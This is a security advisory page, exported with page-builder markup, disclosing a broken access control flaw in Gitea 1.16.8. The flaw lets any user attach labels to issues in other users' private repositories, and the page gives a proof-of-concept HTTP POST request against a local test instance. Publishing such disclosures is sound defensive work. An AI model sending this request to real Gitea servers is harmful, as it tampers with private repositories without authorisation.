{"id":23025,"date":"2022-10-31T12:33:00","date_gmt":"2022-10-31T11:33:00","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=23025"},"modified":"2024-07-24T11:46:00","modified_gmt":"2024-07-24T09:46:00","slug":"usd-2022-0026","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2022-0026\/","title":{"rendered":"usd-2022-0026"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.16\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.27.0\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<\/p>\n

usd-2022-0026 | Broken Access Control in Gitea Issue Labels<\/h2>\n

Advisory ID<\/strong>: usd-2022-0026
Product<\/strong>: Gitea
Affected Version<\/strong>: 1.16.8
Vulnerability Type<\/strong>: https:\/\/cwe.mitre.org\/data\/definitions\/284.html<\/a>
Security Risk<\/strong>: Medium
Vendor URL<\/strong>: https:\/\/gitea.io\/<\/a>
Vendor Status<\/strong>: Fixed
Advisory Status<\/strong>: Closed
CVE number<\/strong>: Not requested yet
CVE Link<\/strong>: Not requested yet
First Published<\/strong>: Not published yet
Last Update<\/strong>: 2022-06-30<\/p>\n

Introduction<\/h3>\n

Gitea allows users to add labels to issues. Due to improper access control, it is possible for any user to add labels to any issue.<\/p>\n

Proof of Concept<\/h3>\n

Issue labels can be attached to issues that you should not be able to access.
The issue_id 7<\/strong> in the example below is an issue of a private repository of another user.<\/p>\n

The 4091<\/strong> is the label id. The label must be exist in the target repository.<\/p>\n

\n
<\/span>POST<\/span> \/testuser\/test222\/issues\/labels<\/span> HTTP<\/span>\/<\/span>1.1<\/span>\nHost<\/span>:<\/span> localhost:3000<\/span>\nContent-Length<\/span>:<\/span> 94<\/span>\nsec-ch-ua<\/span>:<\/span> \"Chromium\";v=\"97\", \" Not;A Brand\";v=\"99\"<\/span>\nAccept<\/span>:<\/span>*\\*\/\\**<\/span>\nContent-Type<\/span>:<\/span> application\/x-www-form-urlencoded; charset=UTF-8<\/span>\nX-Requested-With<\/span>:<\/span> XMLHttpRequest<\/span>\nUser-Agent<\/span>:<\/span> Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/97.0.4692.99 Safari\/537.36<\/span>\nsec-ch-ua-platform<\/span>:<\/span> \"Linux\"<\/span>\nOrigin<\/span>:<\/span> [http:\/\/localhost:3000]()<\/span>\nAccept-Encoding<\/span>:<\/span> gzip, deflate<\/span>\nAccept-Language<\/span>:<\/span> en-US,en;q=0.9<\/span>\nCookie<\/span>:<\/span> XXX<\/span>\nConnection<\/span>:<\/span> close<\/span>\n\n\n_csrf=rmB[...]&action=attach&issue_ids=7&id=4091\n<\/pre>\n<\/div>\n
Fix<\/h3>\n
It is recommended to restrict access to sensitive functions or information by default.
Required access privileges should be granted explicitly by a global access control mechanism.<\/p>\n
References<\/h3>\n